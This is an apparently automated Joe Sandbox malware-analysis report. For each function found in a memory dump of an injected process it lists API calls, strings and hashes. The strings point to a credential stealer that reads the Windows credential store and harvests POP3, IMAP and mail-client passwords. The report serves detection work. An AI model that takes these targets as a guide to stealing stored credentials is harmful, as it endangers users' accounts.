                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                    • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                    Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                    • API String ID: 2360744853-2229823034
                    • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                    • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                    • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                    • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                    Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                    Download Yara Rule
                    APIs
                    • strchr.MSVCRT ref: 004100E4
                    • _mbscpy.MSVCRT ref: 004100F2
                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                    • _mbscpy.MSVCRT ref: 00410142
                    • _mbscat.MSVCRT ref: 0041014D
                    • memset.MSVCRT ref: 00410129
                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                      • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                    • memset.MSVCRT ref: 00410171
                    • memcpy.MSVCRT ref: 0041018C
                    • _mbscat.MSVCRT ref: 00410197
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                    • String ID: \systemroot
                    • API String ID: 912701516-1821301763
                    • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                    • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                    Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$strlen
                    • String ID: -journal$-wal$immutable$nolock
                    • API String ID: 2619041689-3408036318
                    • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                    • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                    • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                    • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                    Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                    • wcslen.MSVCRT ref: 0040874A
                    • _wcsncoll.MSVCRT ref: 00408794
                    • memset.MSVCRT ref: 0040882A
                    • memcpy.MSVCRT ref: 00408849
                    • wcschr.MSVCRT ref: 0040889F
                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                    • String ID: J$Microsoft_WinInet
                    • API String ID: 2203907242-260894208
                    • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                    • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                    Function 004108E5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON
                    Download Yara Rule
                    APIs
                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                    • memcpy.MSVCRT ref: 00410961
                    Strings
                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FromStringUuid$memcpy
                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                    • API String ID: 2859077140-2022683286
                    • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                    • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                    • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                    • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                    Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    • _mbscpy.MSVCRT ref: 00409686
                    • _mbscpy.MSVCRT ref: 00409696
                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                    • API String ID: 888011440-2039793938
                    • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                    • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                    Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • database %s is already in use, xrefs: 0042E9CE
                    • cannot ATTACH database within transaction, xrefs: 0042E966
                    • unable to open database: %s, xrefs: 0042EBD6
                    • database is already attached, xrefs: 0042EA97
                    • out of memory, xrefs: 0042EBEF
                    • too many attached databases - max %d, xrefs: 0042E951
                    • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                    • API String ID: 1297977491-2001300268
                    • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                    • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                    • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                    • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                    Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                    • strchr.MSVCRT ref: 0040327B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileStringstrchr
                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                    • API String ID: 1348940319-1729847305
                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                    Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                    • API String ID: 3510742995-3273207271
                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                    Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$sprintfstrchrstrlen
                    • String ID: %s@gmail.com
                    • API String ID: 3902205911-4097000612
                    • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                    • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                    Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004094C8
                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                    • memset.MSVCRT ref: 0040950C
                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                    • _strcmpi.MSVCRT ref: 00409531
                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                    • String ID: sysdatetimepick32
                    • API String ID: 3411445237-4169760276
                    • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                    • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                    Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                    • GetSysColor.USER32(0000000F), ref: 0040B472
                    • DeleteObject.GDI32(?), ref: 0040B4A6
                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$DeleteImageLoadObject$Color
                    • String ID:
                    • API String ID: 3642520215-0
                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                    Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                    • GetDC.USER32(00000000), ref: 004072FB
                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                    • String ID:
                    • API String ID: 1999381814-0
                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                    Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                    • API String ID: 1297977491-3883738016
                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                    Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                      • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                      • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                    • memcpy.MSVCRT ref: 0044972E
                    • memcpy.MSVCRT ref: 0044977B
                    • memcpy.MSVCRT ref: 004497F6
                      • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                      • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                    • memcpy.MSVCRT ref: 00449846
                    • memcpy.MSVCRT ref: 00449887
                    • memcpy.MSVCRT ref: 004498B8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: gj
                    • API String ID: 438689982-4203073231
                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                    Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: __aulldvrm$__aullrem
                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                    • API String ID: 643879872-978417875
                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                    Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                    • memset.MSVCRT ref: 004058C3
                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                    • SetFocus.USER32(?), ref: 00405976
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$FocusItemmemset
                    • String ID:
                    • API String ID: 4281309102-0
                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                    Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                    • _mbscat.MSVCRT ref: 0040A8FF
                    • sprintf.MSVCRT ref: 0040A921
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileWrite_mbscatsprintfstrlen
                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                    • API String ID: 1631269929-4153097237
                    • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                    • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                    Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040810E
                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,75B4EB20,?), ref: 004081B9
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                    • String ID: POP3_credentials$POP3_host$POP3_name
                    • API String ID: 524865279-2190619648
                    • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                    • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                    Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMenu$CountInfomemsetstrchr
                    • String ID: 0$6
                    • API String ID: 2300387033-3849865405
                    • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                    • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                    Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpystrlen$memsetsprintf
                    • String ID: %s (%s)
                    • API String ID: 3756086014-1363028141
                    • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                    • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                    Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscat$memsetsprintf
                    • String ID: %2.2X
                    • API String ID: 125969286-791839006
                    • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
